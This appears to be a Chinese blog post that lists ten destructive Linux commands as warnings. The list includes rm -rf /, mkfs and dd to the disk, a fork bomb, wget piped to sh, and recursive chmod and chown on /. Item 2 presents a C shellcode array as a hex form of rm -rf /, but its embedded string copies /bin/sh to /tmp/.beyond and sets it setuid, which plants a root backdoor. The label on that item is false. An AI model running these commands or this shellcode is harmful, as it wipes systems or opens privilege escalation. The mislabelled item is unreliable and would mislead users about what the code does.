几条致命的Linux命令

有一些会影响你的程序和系统运行,有一些会直接把你的盘抹掉,这些命令几乎没有什么可以挽回的余地。

1. rm -rf / 这个很简单,此命令将递归并强制删除根目录下的所有文件,根目录会被擦光。

 

2.这是是16进制的 rm -rf /

char esp[] __attribute__ ((section(".text")))=

"\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"

"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"

"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"

"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"

"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"

"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"

"\x6e\x2f\x73\x68\x00\x2d\x63\x00"

"cp -p /bin/sh /tmp/.beyond; chmod 4755

/tmp/.beyond;";

3.下面这条将对硬盘进行重新格式化,自然,硬盘上的所有数据将灰飞烟灭。

mkfs.ext3 /dev/sda

4.著名的 fork 炸弹,下面这串符号(中间没有空格哦!)将告诉你的系统执行海量的进程,直到你的系统僵死。

: ( ) {  : | : &  } ; :

5.这个命令会将会写入大量的RAW数据,其结果是造成数据丢失。

any_command > /dev/sda

6.执行下面这条后无法进入系统,你可以试试哦!

ls > /dev/sda

7.和Windows一样,千万不要乱下载未经证实安全性的源,这年头Linux和胡萝卜一样,也不会保险。

wget some_untrusted_source -O- | sh

8.此命令将移动主目录中的所有文件到一个不存在的地方,这条命令无疑会让系统抓狂,你的主目录会再也看不到。

mv /home/yourhomedirectory/* /dev/null

9.不死也搞你个浑身抢眼

dd if=/dev/zero of=/dev/sda bs=120G count=1

cat /dev/null >/dev/sda

chown -R someone /

chmod 7777 -R /

10.用 0 填充 MBR 和磁盘分区表(包括备份分区表)。因为是MBR,所以不重启之前没有任何异常,重启时BIOS引导系统时会报告找不到硬盘。

dd if=/dev/zero of=/dev/sda bs=1K count=100

标签: 无
返回文章列表 文章二维码
本页链接的二维码
打赏二维码